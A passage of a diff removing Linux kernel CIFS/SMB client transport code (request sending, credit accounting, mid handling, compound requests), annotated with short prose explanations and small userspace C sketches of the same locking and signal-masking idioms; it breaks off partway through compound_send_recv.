+-			rc = smbd_send(server, num_rqst, rqst);
+-		goto smbd_done;
+-	}
+-
+-	rc = -EAGAIN;
+-	if (ssocket == NULL)
+-		goto out;
+-
+-	rc = -ERESTARTSYS;
+-	if (fatal_signal_pending(current)) {
+-		cifs_dbg(FYI, "signal pending before send request\n");
+-		goto out;
+-	}
+-
+-	rc = 0;
+-	/* cork the socket */
+-	tcp_sock_set_cork(ssocket->sk, true);
+-
+-	for (j = 0; j < num_rqst; j++)
+-		send_length += smb_rqst_len(server, &rqst[j]);
+-	rfc1002_marker = cpu_to_be32(send_length);
+-
+-	/*
+-	 * We should not allow signals to interrupt the network send because
+-	 * any partial send will cause session reconnects, thus increasing
+-	 * the latency of system calls and overloading the server with
+-	 * unnecessary requests.
+-	 */
+-
+-	sigfillset(&mask);
+-	sigprocmask(SIG_BLOCK, &mask, &oldmask);
+-
+-	/* Generate a rfc1002 marker for SMB2+ */
+-	if (!is_smb1(server)) {
+-		struct kvec hiov = {
+-			.iov_base = &rfc1002_marker,
+-			.iov_len  = 4
+-		};
+-		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
+-		rc = smb_send_kvec(server, &smb_msg, &sent);
+-		if (rc < 0)
+-			goto unmask;
+-
+-		total_len += sent;
+-		send_length += 4;
+-	}
+-
+-	cifs_dbg(FYI, "Sending smb: smb_len=%u\n", send_length);
+-
+-	for (j = 0; j < num_rqst; j++) {
+-		iov = rqst[j].rq_iov;
+-		n_vec = rqst[j].rq_nvec;
+-
+-		size = 0;
+-		for (i = 0; i < n_vec; i++) {
+-			dump_smb(iov[i].iov_base, iov[i].iov_len);
+-			size += iov[i].iov_len;
+-		}
+-
+-		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
+-
+-		rc = smb_send_kvec(server, &smb_msg, &sent);
+-		if (rc < 0)
+-			goto unmask;
+-
+-		total_len += sent;
+-
+-		/* now walk the page array and send each page in it */
+-		for (i = 0; i < rqst[j].rq_npages; i++) {
+-			struct bio_vec bvec;
+-
+-			bvec.bv_page = rqst[j].rq_pages[i];
+-			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
+-					     &bvec.bv_offset);
+-
+-			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
+-				      &bvec, 1, bvec.bv_len);
+-			rc = smb_send_kvec(server, &smb_msg, &sent);
+-			if (rc < 0)
+-				break;
+-
+-			total_len += sent;
+-		}
+-	}
+-
+-unmask:
+-	sigprocmask(SIG_SETMASK, &oldmask, NULL);
+-
+-	/*
+-	 * If a signal is pending but we have already sent the whole packet
+-	 * to the server, we need to return success status to allow the
+-	 * corresponding mid entry to be kept in the pending requests queue,
+-	 * thus allowing the client to handle responses from the server.
+-	 *
+-	 * If only part of the packet has been sent, there is no need to
+-	 * hide the interrupt because the session will be reconnected
+-	 * anyway, so there won't be any response from the server to handle.
+-	 */
+-
+-	if (signal_pending(current) && (total_len != send_length)) {
+-		cifs_dbg(FYI, "signal is pending after attempt to send\n");
+-		rc = -ERESTARTSYS;
+-	}
+-
+-	/* uncork it */
+-	tcp_sock_set_cork(ssocket->sk, false);
+-
+-	if ((total_len > 0) && (total_len != send_length)) {
+-		cifs_dbg(FYI, "partial send (wanted=%u sent=%zu): terminating session\n",
+-			 send_length, total_len);
+-		/*
+-		 * If we have only sent part of an SMB then the next SMB could
+-		 * be taken as the remainder of this one. We need to kill the
+-		 * socket so the server throws away the partial SMB
+-		 */
+-		cifs_signal_cifsd_for_reconnect(server, false);
+-		trace_smb3_partial_send_reconnect(server->CurrentMid,
+-						  server->conn_id, server->hostname);
+-	}
+-smbd_done:
+-	if (rc < 0 && rc != -EINTR)
+-		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
+-			 rc);
+-	else if (rc > 0)
+-		rc = 0;
+-out:
+-	cifs_in_send_dec(server);
+-	return rc;
+-}
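__smb_send_rqst() above blocks every signal across the socket writes so
a frame can never be truncated mid-send, restores the old mask, and
only then checks whether a signal arrived. The same idiom in minimal
userspace form; send_all_iovecs() is a hypothetical placeholder for the
marker and iovec writes, and sigprocmask() stands in for the kernel's
per-task mask manipulation.

#include <signal.h>

static void send_all_iovecs(void)
{
	/* ... write the RFC1002 marker and all request iovecs here ... */
}

static void send_frame_uninterrupted(void)
{
	sigset_t mask, oldmask;

	sigfillset(&mask);			/* block everything */
	sigprocmask(SIG_BLOCK, &mask, &oldmask);

	send_all_iovecs();			/* uninterruptible region */

	sigprocmask(SIG_SETMASK, &oldmask, NULL);	/* restore */
}

int main(void)
{
	send_frame_uninterrupted();
	return 0;
}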
+-
+-static int
+-smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+-	      struct smb_rqst *rqst, int flags)
+-{
+-	struct kvec iov;
+-	struct smb2_transform_hdr *tr_hdr;
+-	struct smb_rqst cur_rqst[MAX_COMPOUND];
+-	int rc;
+-
+-	if (!(flags & CIFS_TRANSFORM_REQ))
+-		return __smb_send_rqst(server, num_rqst, rqst);
+-
+-	if (num_rqst > MAX_COMPOUND - 1)
+-		return -ENOMEM;
+-
+-	if (!server->ops->init_transform_rq) {
+-		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
+-		return -EIO;
+-	}
+-
+-	tr_hdr = kzalloc(sizeof(*tr_hdr), GFP_NOFS);
+-	if (!tr_hdr)
+-		return -ENOMEM;
+-
+-	memset(&cur_rqst[0], 0, sizeof(cur_rqst));
+-	memset(&iov, 0, sizeof(iov));
+-
+-	iov.iov_base = tr_hdr;
+-	iov.iov_len = sizeof(*tr_hdr);
+-	cur_rqst[0].rq_iov = &iov;
+-	cur_rqst[0].rq_nvec = 1;
+-
+-	rc = server->ops->init_transform_rq(server, num_rqst + 1,
+-					    &cur_rqst[0], rqst);
+-	if (rc)
+-		goto out;
+-
+-	rc = __smb_send_rqst(server, num_rqst + 1, &cur_rqst[0]);
+-	smb3_free_compound_rqst(num_rqst, &cur_rqst[1]);
+-out:
+-	kfree(tr_hdr);
+-	return rc;
+-}
+-
+-int
+-smb_send(struct TCP_Server_Info *server, struct smb_hdr *smb_buffer,
+-	 unsigned int smb_buf_length)
+-{
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 2 };
+-
+-	iov[0].iov_base = smb_buffer;
+-	iov[0].iov_len = 4;
+-	iov[1].iov_base = (char *)smb_buffer + 4;
+-	iov[1].iov_len = smb_buf_length;
+-
+-	return __smb_send_rqst(server, 1, &rqst);
+-}
+-
+-static int
+-wait_for_free_credits(struct TCP_Server_Info *server, const int num_credits,
+-		      const int timeout, const int flags,
+-		      unsigned int *instance)
+-{
+-	long rc;
+-	int *credits;
+-	int optype;
+-	long int t;
+-	int scredits, in_flight;
+-
+-	if (timeout < 0)
+-		t = MAX_JIFFY_OFFSET;
+-	else
+-		t = msecs_to_jiffies(timeout);
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	*instance = 0;
+-
+-	credits = server->ops->get_credits_field(server, optype);
+-	/* Since an echo is already inflight, no need to wait to send another */
+-	if (*credits <= 0 && optype == CIFS_ECHO_OP)
+-		return -EAGAIN;
+-
+-	spin_lock(&server->req_lock);
+-	if ((flags & CIFS_TIMEOUT_MASK) == CIFS_NON_BLOCKING) {
+-		/* oplock breaks must not be held up */
+-		server->in_flight++;
+-		if (server->in_flight > server->max_in_flight)
+-			server->max_in_flight = server->in_flight;
+-		*credits -= 1;
+-		*instance = server->reconnect_instance;
+-		scredits = *credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-
+-		trace_smb3_nblk_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits, -1, in_flight);
+-		cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
+-				__func__, 1, scredits);
+-
+-		return 0;
+-	}
+-
+-	while (1) {
+-		if (*credits < num_credits) {
+-			scredits = *credits;
+-			spin_unlock(&server->req_lock);
+-
+-			cifs_num_waiters_inc(server);
+-			rc = wait_event_killable_timeout(server->request_q,
+-				has_credits(server, credits, num_credits), t);
+-			cifs_num_waiters_dec(server);
+-			if (!rc) {
+-				spin_lock(&server->req_lock);
+-				scredits = *credits;
+-				in_flight = server->in_flight;
+-				spin_unlock(&server->req_lock);
+-
+-				trace_smb3_credit_timeout(server->CurrentMid,
+-						server->conn_id, server->hostname, scredits,
+-						num_credits, in_flight);
+-				cifs_server_dbg(VFS, "wait timed out after %d ms\n",
+-						timeout);
+-				return -EBUSY;
+-			}
+-			if (rc == -ERESTARTSYS)
+-				return -ERESTARTSYS;
+-			spin_lock(&server->req_lock);
+-		} else {
+-			spin_unlock(&server->req_lock);
+-
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus == CifsExiting) {
+-				spin_unlock(&server->srv_lock);
+-				return -ENOENT;
+-			}
+-			spin_unlock(&server->srv_lock);
+-
+-			/*
+-			 * For normal commands, reserve the last MAX_COMPOUND
+-			 * credits for compound requests.
+-			 * Otherwise these compounds could be permanently
+-			 * starved for credits by single-credit requests.
+-			 *
+-			 * To prevent spinning the CPU, block this thread until
+-			 * there are >MAX_COMPOUND credits available.
+-			 * But only do this if we already have a lot of
+-			 * credits in flight, to avoid triggering this check
+-			 * for servers that are slow to hand out credits on
+-			 * new sessions.
+-			 */
+-			spin_lock(&server->req_lock);
+-			if (!optype && num_credits == 1 &&
+-			    server->in_flight > 2 * MAX_COMPOUND &&
+-			    *credits <= MAX_COMPOUND) {
+-				spin_unlock(&server->req_lock);
+-
+-				cifs_num_waiters_inc(server);
+-				rc = wait_event_killable_timeout(
+-					server->request_q,
+-					has_credits(server, credits,
+-						    MAX_COMPOUND + 1),
+-					t);
+-				cifs_num_waiters_dec(server);
+-				if (!rc) {
+-					spin_lock(&server->req_lock);
+-					scredits = *credits;
+-					in_flight = server->in_flight;
+-					spin_unlock(&server->req_lock);
+-
+-					trace_smb3_credit_timeout(
+-							server->CurrentMid,
+-							server->conn_id, server->hostname,
+-							scredits, num_credits, in_flight);
+-					cifs_server_dbg(VFS, "wait timed out after %d ms\n",
+-							timeout);
+-					return -EBUSY;
+-				}
+-				if (rc == -ERESTARTSYS)
+-					return -ERESTARTSYS;
+-				spin_lock(&server->req_lock);
+-				continue;
+-			}
+-
+-			/*
+-			 * Cannot count locking commands against the total
+-			 * as they are allowed to block on the server.
+-			 */
+-
+-			/* update # of requests on the wire to server */
+-			if ((flags & CIFS_TIMEOUT_MASK) != CIFS_BLOCKING_OP) {
+-				*credits -= num_credits;
+-				server->in_flight += num_credits;
+-				if (server->in_flight > server->max_in_flight)
+-					server->max_in_flight = server->in_flight;
+-				*instance = server->reconnect_instance;
+-			}
+-			scredits = *credits;
+-			in_flight = server->in_flight;
+-			spin_unlock(&server->req_lock);
+-
+-			trace_smb3_waitff_credits(server->CurrentMid,
+-					server->conn_id, server->hostname, scredits,
+-					-(num_credits), in_flight);
+-			cifs_dbg(FYI, "%s: remove %u credits total=%d\n",
+-					__func__, num_credits, scredits);
+-			break;
+-		}
+-	}
+-	return 0;
+-}
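wait_for_free_credits() above sleeps on server->request_q until enough
credits are available or the timeout fires, then debits the credits and
bumps in_flight under req_lock. A condition-variable sketch of the same
discipline; everything below (take_credits() and the globals) is a
hypothetical userspace approximation of wait_event_killable_timeout().

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <time.h>

static pthread_mutex_t req_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t request_q = PTHREAD_COND_INITIALIZER;
static int credits;
static int in_flight;

/* returns false on timeout, like the -EBUSY path in the original */
static bool take_credits(int num, int timeout_secs)
{
	struct timespec deadline;

	clock_gettime(CLOCK_REALTIME, &deadline);
	deadline.tv_sec += timeout_secs;

	pthread_mutex_lock(&req_lock);
	while (credits < num) {
		if (pthread_cond_timedwait(&request_q, &req_lock,
					   &deadline) != 0) {
			pthread_mutex_unlock(&req_lock);
			return false;
		}
	}
	credits -= num;		/* *credits -= num_credits */
	in_flight += num;	/* server->in_flight += num_credits */
	pthread_mutex_unlock(&req_lock);
	return true;
}

int main(void)
{
	credits = 3;
	printf("got credits: %s\n", take_credits(2, 1) ? "yes" : "no");
	return 0;
}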
+-
+-static int
+-wait_for_free_request(struct TCP_Server_Info *server, const int flags,
+-		      unsigned int *instance)
+-{
+-	return wait_for_free_credits(server, 1, -1, flags,
+-				     instance);
+-}
+-
+-static int
+-wait_for_compound_request(struct TCP_Server_Info *server, int num,
+-			  const int flags, unsigned int *instance)
+-{
+-	int *credits;
+-	int scredits, in_flight;
+-
+-	credits = server->ops->get_credits_field(server, flags & CIFS_OP_MASK);
+-
+-	spin_lock(&server->req_lock);
+-	scredits = *credits;
+-	in_flight = server->in_flight;
+-
+-	if (*credits < num) {
+-		/*
+-		 * If the server is tight on resources or just gives us fewer
+-		 * credits for other reasons (e.g. requests are coming out of
+-		 * order and the server delays granting more credits until it
+-		 * processes a missing mid) and we have exhausted most available
+-		 * credits, there may be situations when we try to send
+-		 * a compound request but don't have enough credits. At this
+-		 * point the client needs to decide if it should wait for
+-		 * additional credits or fail the request. If at least one
+-		 * request is in flight there is a high probability that the
+-		 * server will return enough credits to satisfy this compound
+-		 * request.
+-		 *
+-		 * Return immediately if no requests in flight since we will be
+-		 * stuck on waiting for credits.
+-		 */
+-		if (server->in_flight == 0) {
+-			spin_unlock(&server->req_lock);
+-			trace_smb3_insufficient_credits(server->CurrentMid,
+-					server->conn_id, server->hostname, scredits,
+-					num, in_flight);
+-			cifs_dbg(FYI, "%s: %d requests in flight, needed %d total=%d\n",
+-					__func__, in_flight, num, scredits);
+-			return -EDEADLK;
+-		}
+-	}
+-	spin_unlock(&server->req_lock);
+-
+-	return wait_for_free_credits(server, num, 60000, flags,
+-				     instance);
+-}
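The check in wait_for_compound_request() above is a deadlock guard: if
we need more credits than we hold and nothing is in flight, no response
can ever arrive to replenish them, so waiting is pointless and the
request fails fast with -EDEADLK. A minimal sketch of just that
decision; compound_admission() is a hypothetical extraction.

#include <errno.h>
#include <stdio.h>

static int compound_admission(int credits, int num, int in_flight)
{
	if (credits < num && in_flight == 0)
		return -EDEADLK;	/* nothing outstanding to grant more */
	return 0;			/* otherwise fall through and wait */
}

int main(void)
{
	printf("idle and short on credits: %d\n", compound_admission(1, 3, 0));
	printf("requests still in flight:  %d\n", compound_admission(1, 3, 4));
	return 0;
}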
+-
+-int
+-cifs_wait_mtu_credits(struct TCP_Server_Info *server, unsigned int size,
+-		      unsigned int *num, struct cifs_credits *credits)
+-{
+-	*num = size;
+-	credits->value = 0;
+-	credits->instance = server->reconnect_instance;
+-	return 0;
+-}
+-
+-static int allocate_mid(struct cifs_ses *ses, struct smb_hdr *in_buf,
+-			struct mid_q_entry **ppmidQ)
+-{
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_NEW) {
+-		if ((in_buf->Command != SMB_COM_SESSION_SETUP_ANDX) &&
+-			(in_buf->Command != SMB_COM_NEGOTIATE)) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are setting up session */
+-	}
+-
+-	if (ses->ses_status == SES_EXITING) {
+-		/* check if SMB session is bad because it is being shut down */
+-		if (in_buf->Command != SMB_COM_LOGOFF_ANDX) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are shutting down session */
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	*ppmidQ = alloc_mid(in_buf, ses->server);
+-	if (*ppmidQ == NULL)
+-		return -ENOMEM;
+-	spin_lock(&ses->server->mid_lock);
+-	list_add_tail(&(*ppmidQ)->qhead, &ses->server->pending_mid_q);
+-	spin_unlock(&ses->server->mid_lock);
+-	return 0;
+-}
+-
+-static int
+-wait_for_response(struct TCP_Server_Info *server, struct mid_q_entry *midQ)
+-{
+-	int error;
+-
+-	error = wait_event_state(server->response_q,
+-				 midQ->mid_state != MID_REQUEST_SUBMITTED,
+-				 (TASK_KILLABLE|TASK_FREEZABLE_UNSAFE));
+-	if (error < 0)
+-		return -ERESTARTSYS;
+-
+-	return 0;
+-}
+-
+-struct mid_q_entry *
+-cifs_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return ERR_PTR(-EIO);
+-
+-	/* enable signing if server requires it */
+-	if (server->sign)
+-		hdr->Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	mid = alloc_mid(hdr, server);
+-	if (mid == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	rc = cifs_sign_rqst(rqst, server, &mid->sequence_number);
+-	if (rc) {
+-		release_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-/*
+- * Send an SMB request and set the callback function in the mid to handle
+- * the result. Caller is responsible for dealing with timeouts.
+- */
+-int
+-cifs_call_async(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-		mid_receive_t *receive, mid_callback_t *callback,
+-		mid_handle_t *handle, void *cbdata, const int flags,
+-		const struct cifs_credits *exist_credits)
+-{
+-	int rc;
+-	struct mid_q_entry *mid;
+-	struct cifs_credits credits = { .value = 0, .instance = 0 };
+-	unsigned int instance;
+-	int optype;
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	if ((flags & CIFS_HAS_CREDITS) == 0) {
+-		rc = wait_for_free_request(server, flags, &instance);
+-		if (rc)
+-			return rc;
+-		credits.value = 1;
+-		credits.instance = instance;
+-	} else
+-		instance = exist_credits->instance;
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * We can't use credits obtained from the previous session to send this
+-	 * request. Check if there were reconnects after we obtained credits and
+-	 * return -EAGAIN in such cases to let callers handle it.
+-	 */
+-	if (instance != server->reconnect_instance) {
+-		cifs_server_unlock(server);
+-		add_credits_and_wake_if(server, &credits, optype);
+-		return -EAGAIN;
+-	}
+-
+-	mid = server->ops->setup_async_request(server, rqst);
+-	if (IS_ERR(mid)) {
+-		cifs_server_unlock(server);
+-		add_credits_and_wake_if(server, &credits, optype);
+-		return PTR_ERR(mid);
+-	}
+-
+-	mid->receive = receive;
+-	mid->callback = callback;
+-	mid->callback_data = cbdata;
+-	mid->handle = handle;
+-	mid->mid_state = MID_REQUEST_SUBMITTED;
+-
+-	/* put it on the pending_mid_q */
+-	spin_lock(&server->mid_lock);
+-	list_add_tail(&mid->qhead, &server->pending_mid_q);
+-	spin_unlock(&server->mid_lock);
+-
+-	/*
+-	 * Need to store the time in mid before calling I/O. For call_async,
+-	 * I/O response may come back and free the mid entry on another thread.
+-	 */
+-	cifs_save_when_sent(mid);
+-	rc = smb_send_rqst(server, 1, rqst, flags);
+-
+-	if (rc < 0) {
+-		revert_current_mid(server, mid->credits);
+-		server->sequence_number -= 2;
+-		delete_mid(mid);
+-	}
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc == 0)
+-		return 0;
+-
+-	add_credits_and_wake_if(server, &credits, optype);
+-	return rc;
+-}
+-
+-/*
+- *
+- * Send an SMB Request.  No response info (other than return code)
+- * needs to be parsed.
+- *
+- * flags indicate the type of request buffer and how long to wait
+- * and whether to log NT STATUS code (error) before mapping it to POSIX error
+- *
+- */
+-int
+-SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
+-		 char *in_buf, int flags)
+-{
+-	int rc;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	iov[0].iov_base = in_buf;
+-	iov[0].iov_len = get_rfc1002_length(in_buf) + 4;
+-	flags |= CIFS_NO_RSP_BUF;
+-	rc = SendReceive2(xid, ses, iov, 1, &resp_buf_type, flags, &rsp_iov);
+-	cifs_dbg(NOISY, "SendRcvNoRsp flags %d rc %d\n", flags, rc);
+-
+-	return rc;
+-}
+-
+-static int
+-cifs_sync_mid_result(struct mid_q_entry *mid, struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "%s: cmd=%d mid=%llu state=%d\n",
+-		 __func__, le16_to_cpu(mid->command), mid->mid, mid->mid_state);
+-
+-	spin_lock(&server->mid_lock);
+-	switch (mid->mid_state) {
+-	case MID_RESPONSE_RECEIVED:
+-		spin_unlock(&server->mid_lock);
+-		return rc;
+-	case MID_RETRY_NEEDED:
+-		rc = -EAGAIN;
+-		break;
+-	case MID_RESPONSE_MALFORMED:
+-		rc = -EIO;
+-		break;
+-	case MID_SHUTDOWN:
+-		rc = -EHOSTDOWN;
+-		break;
+-	default:
+-		if (!(mid->mid_flags & MID_DELETED)) {
+-			list_del_init(&mid->qhead);
+-			mid->mid_flags |= MID_DELETED;
+-		}
+-		cifs_server_dbg(VFS, "%s: invalid mid state mid=%llu state=%d\n",
+-			 __func__, mid->mid, mid->mid_state);
+-		rc = -EIO;
+-	}
+-	spin_unlock(&server->mid_lock);
+-
+-	release_mid(mid);
+-	return rc;
+-}
+-
+-static inline int
+-send_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
+-	    struct mid_q_entry *mid)
+-{
+-	return server->ops->send_cancel ?
+-				server->ops->send_cancel(server, rqst, mid) : 0;
+-}
+-
+-int
+-cifs_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		   bool log_error)
+-{
+-	unsigned int len = get_rfc1002_length(mid->resp_buf) + 4;
+-
+-	dump_smb(mid->resp_buf, min_t(u32, 92, len));
+-
+-	/* verify the signature over the response if the server signed it */
+-	if (server->sign) {
+-		struct kvec iov[2];
+-		int rc = 0;
+-		struct smb_rqst rqst = { .rq_iov = iov,
+-					 .rq_nvec = 2 };
+-
+-		iov[0].iov_base = mid->resp_buf;
+-		iov[0].iov_len = 4;
+-		iov[1].iov_base = (char *)mid->resp_buf + 4;
+-		iov[1].iov_len = len - 4;
+-		/* FIXME: add code to kill session */
+-		rc = cifs_verify_signature(&rqst, server,
+-					   mid->sequence_number);
+-		if (rc)
+-			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
+-				 rc);
+-	}
+-
+-	/* BB special case reconnect tid and uid here? */
+-	return map_and_check_smb_error(mid, log_error);
+-}
+-
+-struct mid_q_entry *
+-cifs_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *ignored,
+-		   struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb_hdr *hdr = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	if (rqst->rq_iov[0].iov_len != 4 ||
+-	    rqst->rq_iov[0].iov_base + 4 != rqst->rq_iov[1].iov_base)
+-		return ERR_PTR(-EIO);
+-
+-	rc = allocate_mid(ses, hdr, &mid);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	rc = cifs_sign_rqst(rqst, ses->server, &mid->sequence_number);
+-	if (rc) {
+-		delete_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-	return mid;
+-}
+-
+-static void
+-cifs_compound_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-	struct cifs_credits credits;
+-
+-	credits.value = server->ops->get_credits(mid);
+-	credits.instance = server->reconnect_instance;
+-
+-	add_credits(server, &credits, mid->optype);
+-}
+-
+-static void
+-cifs_compound_last_callback(struct mid_q_entry *mid)
+-{
+-	cifs_compound_callback(mid);
+-	cifs_wake_up_task(mid);
+-}
+-
+-static void
+-cifs_cancelled_callback(struct mid_q_entry *mid)
+-{
+-	cifs_compound_callback(mid);
+-	release_mid(mid);
+-}
+-
+-/*
+- * Return a channel (master if none) of @ses that can be used to send
+- * regular requests.
+- *
+- * If we are currently binding a new channel (negprot/sess.setup),
+- * return the new incomplete channel.
+- */
+-struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses)
+-{
+-	uint index = 0;
+-
+-	if (!ses)
+-		return NULL;
+-
+-	/* round robin */
+-	index = (uint)atomic_inc_return(&ses->chan_seq);
+-
+-	spin_lock(&ses->chan_lock);
+-	index %= ses->chan_count;
+-	spin_unlock(&ses->chan_lock);
+-
+-	return ses->chans[index].server;
+-}
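cifs_pick_channel() above is a plain round-robin pick: an atomic
sequence counter reduced modulo the channel count sampled under
chan_lock. A userspace sketch of the same selection; pick_channel() and
chan_seq are hypothetical equivalents.

#include <stdatomic.h>
#include <stdio.h>

static atomic_uint chan_seq;

static unsigned int pick_channel(unsigned int chan_count)
{
	/* atomic_inc_return(&ses->chan_seq) % ses->chan_count */
	unsigned int index = atomic_fetch_add(&chan_seq, 1) + 1;

	return index % chan_count;
}

int main(void)
{
	for (int i = 0; i < 6; i++)
		printf("request %d -> channel %u\n", i, pick_channel(3));
	return 0;
}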
+-
+-int
+-compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-		   struct TCP_Server_Info *server,
+-		   const int flags, const int num_rqst, struct smb_rqst *rqst,
+-		   int *resp_buf_type, struct kvec *resp_iov)
+-{
+-	int i, j, optype, rc = 0;
+-	struct mid_q_entry *midQ[MAX_COMPOUND];
+-	bool cancelled_mid[MAX_COMPOUND] = {false};
+-	struct cifs_credits credits[MAX_COMPOUND] = {
+-		{ .value = 0, .instance = 0 }
+-	};
+-	unsigned int instance;
+-	char *buf;
+-
+-	optype = flags & CIFS_OP_MASK;
+-
+-	for (i = 0; i < num_rqst; i++)
+-		resp_buf_type[i] = CIFS_NO_BUFFER;  /* no response buf yet */
+-
+-	if (!ses || !ses->server || !server) {
+-		cifs_dbg(VFS, "Null session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Wait for all the requests to become available.
+-	 * This approach still leaves the possibility of being stuck waiting for
+-	 * credits if the server doesn't grant credits to the outstanding
+-	 * requests and if the client is completely idle, not generating any
+-	 * other requests.
+-	 * This can be handled by the eventual session reconnect.
+-	 */
+-	rc = wait_for_compound_request(server, num_rqst, flags,
+-				       &instance);
+-	if (rc)
+-		return rc;
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		credits[i].value = 1;
+-		credits[i].instance = instance;
+-	}
+-
+-	/*
+-	 * Make sure that we sign in the same order that we send on this socket
+-	 * and avoid races inside tcp sendmsg code that could cause corruption
+-	 * of smb data.
+-	 */
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * All the parts of the compound chain must use credits obtained from
+-	 * the same session. We cannot use credits obtained from a previous
+-	 * session to send this request. Check if there were reconnects after
+-	 * we obtained credits and return -EAGAIN in such cases to let callers
+-	 * handle it.
+-	 */
+-	if (instance != server->reconnect_instance) {
+-		cifs_server_unlock(server);
+-		for (j = 0; j < num_rqst; j++)
+-			add_credits(server, &credits[j], optype);
+-		return -EAGAIN;
+-	}
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		midQ[i] = server->ops->setup_request(ses, server, &rqst[i]);
+-		if (IS_ERR(midQ[i])) {
+-			revert_current_mid(server, i);
+-			for (j = 0; j < i; j++)
+-				delete_mid(midQ[j]);
+-			cifs_server_unlock(server);
+-
+-			/* Update # of requests on wire to server */
+-			for (j = 0; j < num_rqst; j++)
+-				add_credits(server, &credits[j], optype);
+-			return PTR_ERR(midQ[i]);
+-		}
+-
+-		midQ[i]->mid_state = MID_REQUEST_SUBMITTED;
+-		midQ[i]->optype = optype;
+-		/*
+-		 * Invoke callback for every part of the compound chain
+-		 * to calculate credits properly. Wake up this thread only when
+-		 * the last element is received.
+-		 */
+-		if (i < num_rqst - 1)
+-			midQ[i]->callback = cifs_compound_callback;
+-		else
+-			midQ[i]->callback = cifs_compound_last_callback;
+-	}
+-	rc = smb_send_rqst(server, num_rqst, rqst, flags);
+-
+-	for (i = 0; i < num_rqst; i++)
+-		cifs_save_when_sent(midQ[i]);
+-
+-	if (rc < 0) {
+-		revert_current_mid(server, num_rqst);
+-		server->sequence_number -= 2;
+-	}
+-
+-	cifs_server_unlock(server);
+-
+-	/*
+-	 * If sending failed for some reason, or it is an oplock break that we
+-	 * will not receive a response to, return the credits.
+-	 */
+-	if (rc < 0 || (flags & CIFS_NO_SRV_RSP)) {
+-		for (i = 0; i < num_rqst; i++)
+-			add_credits(server, &credits[i], optype);
+-		goto out;
+-	}
+-
+-	/*
+-	 * At this point the request is passed to the network stack - we assume
+-	 * that any credits taken from the server structure on the client have
+-	 * been spent and we can't return them. Once we receive responses
+-	 * we will collect credits granted by the server in the mid callbacks
+-	 * and add those credits to the server structure.
+-	 */
+-
+-	/*
+-	 * Compounding is never used during session establish.
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
+-		spin_unlock(&ses->ses_lock);
+-
+-		cifs_server_lock(server);
+-		smb311_update_preauth_hash(ses, server, rqst[0].rq_iov, rqst[0].rq_nvec);
+-		cifs_server_unlock(server);
+-
+-		spin_lock(&ses->ses_lock);
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		rc = wait_for_response(server, midQ[i]);
+-		if (rc != 0)
+-			break;
+-	}
+-	if (rc != 0) {
+-		for (; i < num_rqst; i++) {
+-			cifs_server_dbg(FYI, "Cancelling wait for mid %llu cmd: %d\n",
+-				 midQ[i]->mid, le16_to_cpu(midQ[i]->command));
+-			send_cancel(server, &rqst[i], midQ[i]);
+-			spin_lock(&server->mid_lock);
